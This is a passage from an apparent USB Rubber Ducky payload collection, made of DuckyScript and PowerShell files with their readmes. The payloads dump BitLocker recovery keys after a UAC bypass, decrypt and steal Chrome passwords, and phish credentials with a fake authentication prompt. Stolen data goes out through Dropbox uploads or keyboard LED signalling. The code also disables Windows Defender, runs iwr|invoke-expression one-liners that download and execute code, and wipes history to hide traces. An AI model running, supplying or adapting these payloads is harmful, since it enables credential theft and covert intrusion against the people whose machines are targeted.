Method.\r\n\r\n TARGET:\r\n Windows Hosts that supports powershell and SendKeys\r\n\r\n USAGE:\r\n Type out your command or script with powershell, don't execute it yet (so just type it out with STRING), afterwards you put the function Windows_Fileless_HID_Exfil() behind it.\r\n It'll take the commands/scritps output and writes it into a variable, which then gets exfiltrated.\r\n\r\n Example Usage:\r\n GUI r\r\n DELAY 500\r\n STRINGLN powershell\r\n DELAY 1000\r\n STRING echo \"This is my test\"\r\n Windows_Fileless_HID_Exfil()\r\n END_REM\r\n\r\n FUNCTION Windows_Fileless_HID_Exfil()\r\n DELAY 250\r\n REM Saving current Keyboard lock keys\r\n SAVE_HOST_KEYBOARD_LOCK_STATE\r\n $_EXFIL_MODE_ENABLED = TRUE\r\n $_EXFIL_LEDS_ENABLED = TRUE\r\n DELAY 500\r\n REM Setting the output as variable\r\n STRING |Out-String|Set-Variable -Name \"DD\";\r\n REM Converting output into Lock Key values\r\n STRING $BL = $DD.ToCharArray();$c = \"\";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';\r\n REM Exfiltrating via Keystroke Reflection\r\n STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit\r\n REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.\r\n WAIT_FOR_SCROLL_CHANGE\r\n LED_G\r\n $_EXFIL_MODE_ENABLED = FALSE\r\n RESTORE_HOST_KEYBOARD_LOCK_STATE\r\n END_FUNCTION\r\nEND_EXTENSION\r\n\r\nREM Execution of \"Yes\" shortcut: ALT j (german), ALT y (english)\r\nDEFINE #YES_SHORTCUT ALT j\r\n\r\nREM If Target is Windows, execute payload\r\nIF ($_OS == WINDOWS) THEN\r\n GUI r\r\n DELAY 500\r\n REM Opening hidden powershell and pressing CAPSLOCK as Administrator\r\n STRING powershell -nop -c \"Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait('{CAPSLOCK}');powershell.exe -nop -w h\"\r\n DELAY 250\r\n CTRL-SHIFT ENTER\r\nREM Rather long DELAY to increase reliability\r\n DELAY 2000\r\nREM Shortcut for pressing yes when UAC prompt appears\r\n #YES_SHORTCUT\r\nREM Check for CAPSLOCK change to see if execution as Admin was successful \r\n WAIT_FOR_CAPS_CHANGE\r\n DELAY 1500\r\nREM Dumping recovery keys\r\n STRING Get-BitLockerVolume|ForEach-Object{$drive = $_.MountPoint;$Key = [string]($_.KeyProtector).RecoveryPassword;if ($Key.Length -gt 5){Write-Output (\"$drive Drive - Recovery Key: $Key\")}}\r\nREM Exfiltrating keys via Keystroke Reflection\r\n Windows_Fileless_HID_Exfil()\r\n DELAY 150\r\n Detect_Finished()\r\nREM If System is not Windows...\r\nELSE \r\n DELAY 500\r\nREM ... and CAPSLOCK is ON, open Storage... \r\n IF ($_CAPSLOCK_ON == TRUE) THEN\r\n ATTACKMODE STORAGE\r\nREM ... If CAPSLOCK is OFF, stay in ATTACKMODE OFF \r\n ELSE\r\n LED_RED\r\n DELAY 1000\r\n LED_OFF\r\n ATTACKMODE OFF\r\n END_IF\r\nEND_IF\r\n" }, { "path": "payloads/library/credentials/BitLockerKeyDump/readme.md", "content": "**Title: BitLockerKeyDump**\r\n\r\n

Author: 0i41E
\r\nOS: Windows
\r\nVersion: 1.0
\r\n\r\n**What is BitLockerKeyDump?**\r\n\r\n#\r\n

Lets first explain, what is \"a BitLocker recovery key\"?\r\n\r\nA BitLocker recovery key is a unique 48-digit numerical password that is generated when you enable BitLocker on a Windows computer or device. \r\nBitLocker is a disk encryption program included with Windows, and is designed to protect the data on your hard drive by encrypting it. \r\nThe recovery key is a critical component of BitLocker because it is used to unlock or recover access to the encrypted drive in case you forget your BitLocker password or experience issues with your computer's hardware or software.\r\nCommon scenarios where you might need a BitLocker recovery key:\r\n- Forgotten Password: If you forget the password you set for BitLocker, you can use the recovery key to regain access to your encrypted drive.\r\n- Hardware Changes: If you make significant hardware changes to your computer, such as replacing the motherboard or hard drive, BitLocker may trigger a recovery mode, and you'll need the recovery key to unlock the drive.\r\n- Operating System Errors: In the event of certain operating system errors or issues, BitLocker may require the recovery key to restore access to the encrypted drive.\r\n\r\nIt's important to keep your BitLocker recovery key in a safe and secure location because it provides a way to bypass BitLocker's encryption and access your data.

\r\n\r\nNow that we have explained what BitLocker and the recovery key are, what is BitLockerKeyDump? Short and easy: It dumps the recovery key and exfiltrates it via Keystroke Reflection.\r\n\r\n\r\n\r\n**Instructions:**\r\n1. Set the correct \"Yes\" shortcut in line 132. (i.e. `ALT j` for german systems, `ALT y` for english keyboard layouts)\r\n\r\n2. Plug in your RubberDucky into a Windows target and wait for the process to end. Have fun observing the Keyboards LEDs ;)\r\n\r\n_*If plugged into a non Windows system, `ATTACKMODE OFF` will be triggered, unless `CAPSLOCK` is ON while the Ducky is getting plugged in. This way you can collect the loot savely._\r\n\r\n3. Open the exfiltrated loot.bin file to access the recovery key." }, { "path": "payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/ReadMe.md", "content": "## About:\r\n* Title: Browser-Passwords-Dropbox-Exfiltration\r\n* Description: Opens PowerShell hidden, grabs Chrome passwords, saves as a cleartext file and exfiltrates info via Dropbox.\r\n* Then it cleans up traces of what you have done after.\r\n* AUTHOR: DIYS.py\r\n* Version: 1.0\r\n* Category: Credentials, Exfiltration\r\n* Target: Windows 10\r\n* Attackmodes: HID\r\n\r\n### Features:\r\n* Reasonably stelathy\r\n* Fairly quick\r\n\r\n### Workflow:\r\n* Encoding payload and injecting on target's system.\r\n* Checks Chrome files and obtains the stored browser credentials\r\n* Saves a plaintext file of all of the usernames, passwords, websites \r\n* Deletes the Temp files, recycle bin, Run and PowerShell history\r\n\r\n### Usage Version 01:\r\n1. Follow the instructions on the link enclosed in the PowerShell script to create the correct API access credentials for your Dropbox account.\r\n2. Obtain your Authentication Token and add it to the PowerShell script, upload that script to your dropbox and add the link to it in the payload file.\r\n3. Encode payload.txt and inject into target's system.\r\n4. Check your Dropbox for the files.\r\n\r\n### Possible Issues:\r\n1. AVG detected this was trying to access Chrome info and blocked it from working some of the time.\r\n\r\nDIYSpy on Twitter\r\n" }, { "path": "payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/Version 01/Browser-Passwords-Dropbox-Exfiltration.ps1", "content": "#########################################################################################################\n# | #\n# Title : Browser-Passwords-Dropbox-Exfiltration | ____ _____ ______ #\n# Author : DIYS.py | | _ \\_ _\\ \\ / / ___| _ __ _ _ #\n# Version : 1.0 | | | | | | \\ V /\\___ \\ | '_ \\| | | | #\n# Category : Credentials, Exfiltration | | |_| | | | | ___) || |_) | |_| | #\n# Target : Windows 10 | |____/___| |_| |____(_) .__/ \\__, | #\n# Mode : HID | |_| |___/ #\n# Props : I am Jakoby, NULLSESSION0X | #\n# | # \n#########################################################################################################\n\n<#\n.SYNOPSIS\n\tThis script exfiltrates credentials from the browser via Dropbox.\n.DESCRIPTION \n\tCheckes and saves the credentials from the Chrome browser, then connects to Dropbox and uploads\n the file containing all of the loot.\n.Link\n\thttps://developers.dropbox.com/oauth-guide\t\t# Guide for setting up your DropBox for uploads\n#>\n\n$DropBoxAccessToken = \"YOUR-DROPBOX-ACCESS-TOKEN\"\n\n$FileName = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt\"\n\n#Stage 1 Obtain the credentials from the Chrome browsers User Data folder\n\n#First we Kill Chrome just to be safe\nStop-Process -Name Chrome\n\n$d=Add-Type -A System.Security\n$p='public static'\n$g=\"\"\")]$p extern\"\n$i='[DllImport(\"winsqlite3\",EntryPoint=\"sqlite3_'\n$m=\"[MarshalAs(UnmanagedType.LP\"\n$q='(s,i)'\n$f='(p s,int i)'\n$z=$env:LOCALAPPDATA+'\\Google\\Chrome\\User Data'\n$u=[Security.Cryptography.ProtectedData]\nAdd-Type \"using System.Runtime.InteropServices;using p=System.IntPtr;$p class W{$($i)open$g p O($($m)Str)]string f,out p d);$($i)prepare16_v2$g p P(p d,$($m)WStr)]string l,int n,out p s,p t);$($i)step$g p S(p s);$($i)column_text16$g p C$f;$($i)column_bytes$g int Y$f;$($i)column_blob$g p L$f;$p string T$f{return Marshal.PtrToStringUni(C$q);}$p byte[] B$f{var r=new byte[Y$q];Marshal.Copy(L$q,r,0,Y$q);return r;}}\"\n$s=[W]::O(\"$z\\\\Default\\\\Login Data\",[ref]$d)\n$l=@()\nif($host.Version-like\"7*\"){$b=(gc \"$z\\\\Local State\"|ConvertFrom-Json).os_crypt.encrypted_key\n$x=[Security.Cryptography.AesGcm]::New($u::Unprotect([Convert]::FromBase64String($b)[5..($b.length-1)],$n,0))}$_=[W]::P($d,\"SELECT*FROM logins WHERE blacklisted_by_user=0\",-1,[ref]$s,0)\nfor(;!([W]::S($s)%100)){$l+=[W]::T($s,0),[W]::T($s,3)\n$c=[W]::B($s,5)\ntry{$e=$u::Unprotect($c,$n,0)}catch{if($x){$k=$c.length\n$e=[byte[]]::new($k-31)\n$x.Decrypt($c[3..14],$c[15..($k-17)],$c[($k-16)..($k-1)],$e)}}$l+=($e|%{[char]$_})-join''}\n#After Decrypting the contents of the files, save them to a file in the temp folder.\n\necho $l >> $env:TMP\\$FileName\n\n#Start Chrome again\n\n$pathToChrome = 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\nStart-Process -FilePath $pathToChrome\n\n#Stage 2 Upload them to Dropbox\n\n<#\n.NOTES \n\tThis is to upload your files to dropbox\n#>\n\n$TargetFilePath=\"/$FileName\"\n$SourceFilePath=\"$env:TMP\\$FileName\"\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\n$authorization = \"Bearer \" + $DropBoxAccessToken\n$headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\n$headers.Add(\"Authorization\", $authorization)\n$headers.Add(\"Dropbox-API-Arg\", $arg)\n$headers.Add(\"Content-Type\", 'application/octet-stream')\nInvoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\n\n\n#Stage 3 Cleanup Traces\n\n<#\n.NOTES \n\tThis is to clean up behind you and remove any evidence to prove you were there\n#>\n\n# Delete contents of Temp folder \n\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\n\n# Delete run box history\n\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\n\n# Delete powershell history\n\nRemove-Item (Get-PSreadlineOption).HistorySavePath\n\n# Deletes contents of recycle bin\n\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\n\nexit\n" }, { "path": "payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/Version 01/payload.txt", "content": "REM #########################################################################################################\nREM # | #\nREM # Title : Browser-Passwords-Dropbox-Exfiltration | ____ _____ ______ #\nREM # Author : DIYS.py | | _ \\_ _\\ \\ / / ___| _ __ _ _ #\nREM # Version : 1.0 | | | | | | \\ V /\\___ \\ | '_ \\| | | | #\nREM # Category : Credentials, Exfiltration | | |_| | | | | ___) || |_) | |_| | #\nREM # Target : Windows 10 (PowerShell + Chrome) | |____/___| |_| |____(_) .__/ \\__, | #\nREM # Mode : HID | |_| |___/ #\nREM # Props : I am Jakoby, NULLSESSION0X | #\nREM # Description : Opens PowerShell hidden, grabs Chrome | #\nREM # passwords, saves as a cleartext file and | # \nREM # exfiltrates info via Dropbox. | # \nREM # Then it cleans up traces of what you have done | # \nREM # after. | # \nREM #########################################################################################################\n\nATTACKMODE HID\n\nDELAY 3000\nGUI r\nDELAY 250\nSTRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://< Your Shared link for the intended file>?dl=1; invoke-expression $pl\n\nREM Remember to replace the link with your DropBox shared link for the intended file to download\nREM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly\n" }, { "path": "payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/payload.txt", "content": "REM #########################################################################################################\nREM # | #\nREM # Title : Browser-Passwords-Dropbox-Exfiltration | ____ _____ ______ #\nREM # Author : DIYS.py | | _ \\_ _\\ \\ / / ___| _ __ _ _ #\nREM # Version : 1.0 | | | | | | \\ V /\\___ \\ | '_ \\| | | | #\nREM # Category : Credentials, Exfiltration | | |_| | | | | ___) || |_) | |_| | #\nREM # Target : Windows 10 | |____/___| |_| |____(_) .__/ \\__, | #\nREM # Mode : HID | |_| |___/ #\nREM # Props : I am Jakoby, NULLSESSION0X | #\nREM # | # \nREM #########################################################################################################\n\nREM Title: Browser-Passwords-Dropbox-Exfiltration\nREM Author: DIYS.py\nREM Description: Opens PowerShell hidden, grabs Chrome passwords, saves as a cleartext file and exfiltrates info via Dropbox.\nREM Then it cleans up traces of what you have done after.\nREM Target: Windows 10 (PowerShell + Chrome)\nREM Version: 1.0\nREM Category: Credentials, Exfiltration\n\n\nDELAY 3000\nGUI r\nDELAY 250\nSTRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://< Your Shared link for the intended file>?dl=1; invoke-expression $pl\n\nREM Remember to replace the link with your DropBox shared link for the intended file to download\nREM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly\n" }, { "path": "payloads/library/credentials/DevilsCupid/README.md", "content": "\n![Logo](https://static.vecteezy.com/system/resources/previews/005/308/344/original/devil-cupid-illustration-vector.jpg)\n# The Devil's Cupid\nVersion 1.0 \nLast updated 24/02/2023\n\nThe Devil's Cupid is a Rubber Ducky script that tricks your target into sharing their credentials through a fake authentication pop up message. \nIt is highly adaptable and leaves no trace. (Thank you Avunit ❤️)\n\n\n## Setup\n\nWhat you'll need:\n- A [Rubber Ducky USB HID Device](https://shop.hak5.org/products/usb-rubber-ducky) (Also works on old gen!)\n- A DropBox account.\n- A [DropBox Access Token](https://help.displayr.com/hc/en-us/articles/360004116315-How-to-Create-an-Access-Token-for-Dropbox#:~:text=Go%20to%20the%20Dropbox%20App,section%20and%20click%20on%20Generate.)\n\n### Step 1\nGo to your [DropBox App Console](https://www.dropbox.com/developers/apps) and click **Create app**. \n\n![App creation](https://i.imgur.com/KsAChJF.png) \nConfigure the app as shown above. You can change *Name you app* to whatever you want. \nAfter you've named your app, click **Create app**.\n\nOnce your app is created, navigate to the **Permissions** tab. \nYou need to enable:\n- **files.metadata.write**\n- **files.content.write**\n- **files.content.read**\n- **file_requests.write**\n\nAfter making those changes, click **Submit** at teh bottom of the page to apply them.\n\n![Permissions](https://i.imgur.com/5fGB38H.png)\n\nNavigate back to the **Settings** tab.\n\n![Access Token](https://i.imgur.com/H79vVY5.png)\n\nUnder **Generate access token** click **Generate**. \nYou will get a unique access token. Do not share it with anyone! \n\n**Copy the token.** You will need it in the next step.\n\n### Step 2\nOpen **devilsCupid.ps1** and edit `$DropBoxAccessToken = \"\"`. \nReplace `` with your token.\n\nFor example, if your access token is `...gwireg3hiu6rg8asasfsads2ad...` it should look like this: \n`$DropBoxAccessToken = \"...gwireg3hiu6rg8asasfsads2ad...\"`.\n\n**Save the file.**\n\n### Step 2\n\nGo to your DropBox and upload your modified **devilsCupid.ps1** to it.\n\n![DropBox Screenshot](https://i.imgur.com/9GcOXVi.png)\n\nOnce it's done uploading, click **Copy link**. \nThe link should look something like `https://www.dropbox.com/s/sk10x6okx49kcq9/devilsCupid.ps1?dl=0`.\n\n### Step 3\nOpen **inject.txt**. \nIt will look like this:\n\n```bash\nDELAY 1000\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr LINK_TO_YOUR_DEVILSCUPID.PS1; invoke-expression $pl\nENTER\n```\n\nReplace **LINK_TO_YOUR_DEVILSCUPID.PS1** with the link you've copied in the previous step.\n\n**VERY IMPORTANT:** Replace the end **dl=0** with **dl=1**. \nThe modified link should look like `https://www.dropbox.com/s/sk10x6okx49kcq9/devilsCupid.ps1?dl=1`. \n\nThe modified **inject.txt** should look something like this:\n```bash\nDELAY 1000\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://www.dropbox.com/s/sk10x6okx49kcq9/devilsCupid.ps1?dl=1; invoke-expression $pl\nENTER\n```\nSave the changes.\n\n### Step 4\n\nNavigate to [Ducktoolkit.com](https://ducktoolkit.com/encode). Credits to [James Hall](https://twitter.com/411hall) & [Kevin Breen](https://techanarchy.net/) for this awesome tool ❤️\n\n![Duck Toolkit](https://i.imgur.com/ymaeeN7.png)\n\nPaste your modified **inject.txt** code in the Duck Code box. \nSelect the keyboard layout under *Language* tab. \nClick **Encode Payload**. \n\nAfter encoding click **Download inject.bin**.\n\nPut the **inject.bin** file on your Rubber Ducky. \nYou're done!\n" }, { "path": "payloads/library/credentials/DevilsCupid/devilsCupid.ps1", "content": "############################################################################################################################################################ \n#\n# _______ __ __ __ ______ __ __ \n#| \\ | \\| \\| \\ / \\ | \\ | \\\n#| $$$$$$$\\ ______ __ __ \\$$| $$| $$_______ | $$$$$$\\ __ __ ______ \\$$ ____| $$\n#| $$ | $$ / \\| \\ / \\| \\| $$ \\$/ \\ | $$ \\$$| \\ | \\ / \\ | \\ / $$\n#| $$ | $$| $$$$$$\\\\$$\\ / $$| $$| $$ | $$$$$$$ | $$ | $$ | $$| $$$$$$\\| $$| $$$$$$$\n#| $$ | $$| $$ $$ \\$$\\ $$ | $$| $$ \\$$ \\ | $$ __ | $$ | $$| $$ | $$| $$| $$ | $$\n#| $$__/ $$| $$$$$$$$ \\$$ $$ | $$| $$ _\\$$$$$$\\ | $$__/ \\| $$__/ $$| $$__/ $$| $$| $$__| $$\n#| $$ $$ \\$$ \\ \\$$$ | $$| $$ | $$ \\$$ $$ \\$$ $$| $$ $$| $$ \\$$ $$\n# \\$$$$$$$ \\$$$$$$$ \\$ \\$$ \\$$ \\$$$$$$$ \\$$$$$$ \\$$$$$$ | $$$$$$$ \\$$ \\$$$$$$$\n# | $$ \n# | $$ \n# \\$$ \n# By LulzHades\n############################################################################################################################################################\n\n#Version 1.0\n#Last updated 24/02/2023\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\n$DropBoxAccessToken = \"\"\n$FileName = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt\"\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\n<# This is to generate the ui.prompt you will use to harvest their credentials #>\n\nfunction Get-Creds {\ndo{\n$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password\n if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) {\n #[System.Windows.Forms.MessageBox]::Show(\"Credentials can not be empty!\")\n [System.Windows.Forms.MessageBox]::Show(\"Credentials can not be empty!\",\"Error\",[System.Windows.Forms.MessageBoxButtons]::OK,[System.Windows.Forms.MessageBoxIcon]::Error)\n Get-Creds\n}\n$creds = $cred.GetNetworkCredential() | fl\nreturn $creds\n # ...\n\n $done = $true\n} until ($done)\n\n}\n\n#----------------------------------------------------------------------------------------------------\n\n<# This is to pause the script until a mouse movement is detected #>\n\nfunction Pause-Script{\nAdd-Type -AssemblyName System.Windows.Forms\n$originalPOS = [System.Windows.Forms.Cursor]::Position.X\n$o=New-Object -ComObject WScript.Shell\n\n while (1) {\n $pauseTime = 3\n if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){\n break\n }\n else {\n $o.SendKeys(\"{CAPSLOCK}\");Start-Sleep -Seconds $pauseTime\n }\n }\n}\n\n#----------------------------------------------------------------------------------------------------\n\n# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off \n\nfunction Caps-Off {\nAdd-Type -AssemblyName System.Windows.Forms\n$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')\n\n#If true, toggle CapsLock key, to ensure that the script doesn't fail\nif ($caps -eq $true){\n\n$key = New-Object -ComObject WScript.Shell\n$key.SendKeys('{CapsLock}')\n}\n}\n#----------------------------------------------------------------------------------------------------\n\n<# This is to call the function to pause the script until a mouse movement is detected then activate the pop-up #>\n\nPause-Script\n\nCaps-Off\n\nAdd-Type -AssemblyName System.Windows.Forms\n\n# [System.Windows.Forms.MessageBox]::Show(\"Unusual sign-in. Please reauthenticate your account\")\n[System.Windows.Forms.MessageBox]::Show(\"Please re-authenticate your account!\",\"Account Warning\",[System.Windows.Forms.MessageBoxButtons]::OK,[System.Windows.Forms.MessageBoxIcon]::Warning)\n\n$creds = Get-Creds\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\n<# This is to save the gathered credentials to a file in the temp directory #>\n\necho $creds >> $env:TMP\\$FileName\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\n<# This is to upload your files to DropBox #>\n\n$TargetFilePath=\"/$FileName\"\n$SourceFilePath=\"$env:TMP\\$FileName\"\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\n$authorization = \"Bearer \" + $DropBoxAccessToken\n$headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\n$headers.Add(\"Authorization\", $authorization)\n$headers.Add(\"Dropbox-API-Arg\", $arg)\n$headers.Add(\"Content-Type\", 'application/octet-stream')\nInvoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\n<# This is to clean up behind you and remove any evidence to prove you were in the system #>\n\n# Delete contents of Temp folder \nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\n\n# Delete run box history\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\n\n# Delete powershell history\nRemove-Item (Get-PSreadlineOption).HistorySavePath\n\n# Deletes contents of recycle bin\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\n" }, { "path": "payloads/library/credentials/DevilsCupid/sourceCode.txt", "content": "REM Author: Nejc Pirečnik\nREM Devil's Cupid\nREM The Devil's Cupid is a Rubber Ducky script that tricks your target into sharing their credentials through a fake authentication pop up message.\n\nDEFINE #DROPBOX_URL example.com\nREM You must replace the URL end with ?dl=1!\n\nDELAY 1000\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr #DROPBOX_URL; invoke-expression $pl\nENTER\n" }, { "path": "payloads/library/credentials/Duckie-Harvest/README.md", "content": "# Duckie-Harvest\n## Overview\n\nThis script is designed for penetration testing purposes and offers the following functionalities:\n\n- **Dump Wi-Fi Passwords**: Extracts and saves all Wi-Fi passwords stored on the target machine.\n- **Dump Browser Credentials**: Extracts saved credentials from Google Chrome, Brave, Firefox, and Microsoft Edge.\n- **System Information**: Collects and dumps comprehensive system information, including network configurations and active processes.\n- **Network Configuration**: Gathers detailed network configuration data and performs a network scan.\n- **Reverse Shell**: Initiates a reverse shell to provide remote command-line access (requires configuration of the attacker IP and attacker port).\n\nThis payload is intended for use with a USB Rubber Ducky device.\n\n## Usage\n\n### Prerequisites\n\n- **USB Rubber Ducky**: Ensure you have a USB Rubber Ducky device.\n- **Powershell**: The target machine must have Powershell installed.\n\n### Configuration\n\n1. **Configure drive name**:\n edit the powershell script to set the name of your drive\n \n ```powershell\n $DRIVE = 'DUCKY'\n2. **Configure Attacker IP and Port**:\n Edit the powershell script to set your attacker's IP address and port for the reverse shell connection:\n \n ```powershell\n $IP = 'YOUR_IP'\n $PORT = 'YOUR_PORT'\n\n3. **Configure drive and powershell script name **:\n edit the payload.txt to set both the name of the drive label and the powershell script\n\n ```Duckyscript\n DEFINE #DUCKY_DRIVER_LABEL DUCKY\n DEFINE #PS1 sy_cred.ps1\n \n" }, { "path": "payloads/library/credentials/Duckie-Harvest/payload.txt", "content": "ATTACKMODE HID STORAGE\nEXTENSION PASSIVE_WINDOWS_DETECT\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n Windows fully passive OS Detection and passive Detect Ready\n Includes its own passive detect ready.\n Does not require additional extensions.\n\n USAGE:\n Extension runs inline (here)\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\n boot delay\n $_OS will be set to WINDOWS or NOT_WINDOWS\n See end of payload for usage within payload\n END_REM\n\n REM CONFIGURATION:\n DEFINE #MAX_WAIT 150\n DEFINE #CHECK_INTERVAL 20\n DEFINE #WINDOWS_HOST_REQUEST_COUNT 2\n DEFINE #NOT_WINDOWS 7\n\n $_OS = #NOT_WINDOWS\n\n VAR $MAX_TRIES = #MAX_WAIT\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\n DELAY #CHECK_INTERVAL\n $MAX_TRIES = ($MAX_TRIES - 1)\n END_WHILE\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN\n $_OS = WINDOWS\n END_IF\n\n REM_BLOCK EXAMPLE USAGE AFTER EXTENSION\n IF ($_OS == WINDOWS) THEN\n STRING HELLO WINDOWS!\n ELSE\n STRING HELLO WORLD!\n END_IF\n END_REM\nEND_EXTENSION\n\nDEFINE #DUCKY_DRIVER_LABEL DUCKY\nDEFINE #PS1 sy_cred.ps1\n\nIF ($_OS == WINDOWS )THEN\n \n DELAY 200\n REM -----open Powershell as Admin\n GUI r\n DELAY 200\n STRING powershell \n CTRL-SHIFT ENTER\n DELAY 400\n LEFT\n DELAY 150\n ENTER\n DELAY 500\n STRINGLN_POWERSHELL\n\n $duckletter = (Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.VolumeName -eq '#DUCKY_DRIVER_LABEL' }).DeviceID;cd $duckletter\n Set-MpPreference -DisableRealtimeMonitoring $true\n Start-Process powershell.exe -ArgumentList \"-NoProfile -WindowStyle Hidden -File #PS1\" -WindowStyle Hidden\n exit\n\n END_STRINGLN\n\n \n\nEND_IF\n" }, { "path": "payloads/library/credentials/Duckie-Harvest/sy_cred.ps1", "content": "\n\n#-- Payload configuration --#\n\n$DRIVE = 'DUCKY' # Drive letter of the USB Rubber Ducky\n$IP = 'YOUR_IP' # IP address of the attacker machine\n$PORT = 'YOUR_PORT' # Port to use for the reverse shell\n\n\n# Set destination directory\n\n\n\n$duckletter = (Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.VolumeName -eq $DRIVE }).DeviceID\nSet-Location $duckletter\n\nSet-MpPreference -DisableRealtimeMonitoring $true\nAdd-MpPreference -ExclusionPath \"${duckletter}\\\"\nSet-MpPreference -ExclusionExtension \"ps1\"\n\n$destDir = \"$duckletter\\$env:USERNAME\"\nif (-Not (Test-Path $destDir)) {\n New-Item -ItemType Directory -Path $destDir\n}\n\n# Function to copy browser files\nfunction CopyBrowserFiles($browserName, $browserDir, $filesToCopy) {\n $browserDestDir = Join-Path -Path $destDir -ChildPath $browserName\n if (-Not (Test-Path $browserDestDir)) {\n New-Item -ItemType Directory -Path $browserDestDir\n }\n\n foreach ($file in $filesToCopy) {\n $source = Join-Path -Path $browserDir -ChildPath $file\n if (Test-Path $source) {\n Copy-Item -Path $source -Destination $browserDestDir\n Write-Host \"$browserName - File copiato: $file\"\n } else {\n Write-Host \"$browserName - File non trovato: $file\"\n }\n }\n}\n\n# Configuration for Google Chrome\n$chromeDir = \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\"\n$chromeFilesToCopy = @(\"Login Data\")\nCopyBrowserFiles \"Chrome\" $chromeDir $chromeFilesToCopy\nCopy-Item -Path \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Local State\" -Destination (Join-Path -Path $destDir -ChildPath \"Chrome\") -ErrorAction SilentlyContinue\n\n# Configuration for Brave\n$braveDir = \"$env:LOCALAPPDATA\\BraveSoftware\\Brave-Browser\\User Data\\Default\"\n$braveFilesToCopy = @(\"Login Data\")\nCopyBrowserFiles \"Brave\" $braveDir $braveFilesToCopy\nCopy-Item -Path \"$env:LOCALAPPDATA\\BraveSoftware\\Brave-Browser\\User Data\\Local State\" -Destination (Join-Path -Path $destDir -ChildPath \"Brave\") -ErrorAction SilentlyContinue\n\n# Configuration for Firefox\n$firefoxProfileDir = Join-Path -Path $env:APPDATA -ChildPath \"Mozilla\\Firefox\\Profiles\"\n$firefoxProfile = Get-ChildItem -Path $firefoxProfileDir -Filter \"*.default-release\" | Select-Object -First 1\nif ($firefoxProfile) {\n $firefoxDir = $firefoxProfile.FullName\n $firefoxFilesToCopy = @(\"logins.json\", \"key4.db\", \"cookies.sqlite\", \"webappsstore.sqlite\", \"places.sqlite\")\n CopyBrowserFiles \"Firefox\" $firefoxDir $firefoxFilesToCopy\n} else {\n Write-Host \"Firefox - Nessun profilo trovato.\"\n}\n\n# Configuration for Microsoft Edge\n$edgeDir = \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\"\n$edgeFilesToCopy = @(\"Login Data\")\nCopyBrowserFiles \"Edge\" $edgeDir $edgeFilesToCopy\nCopy-Item -Path \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Local State\" -Destination (Join-Path -Path $destDir -ChildPath \"Edge\") -ErrorAction SilentlyContinue\n\n# Gather additional system information\nfunction GatherSystemInfo {\n $sysInfoDir = \"$duckletter\\$env:USERNAME\\SystemInfo\"\n if (-Not (Test-Path $sysInfoDir)) {\n New-Item -ItemType Directory -Path $sysInfoDir\n }\n\n Get-ComputerInfo | Out-File -FilePath \"$sysInfoDir\\computer_info.txt\"\n Get-Process | Out-File -FilePath 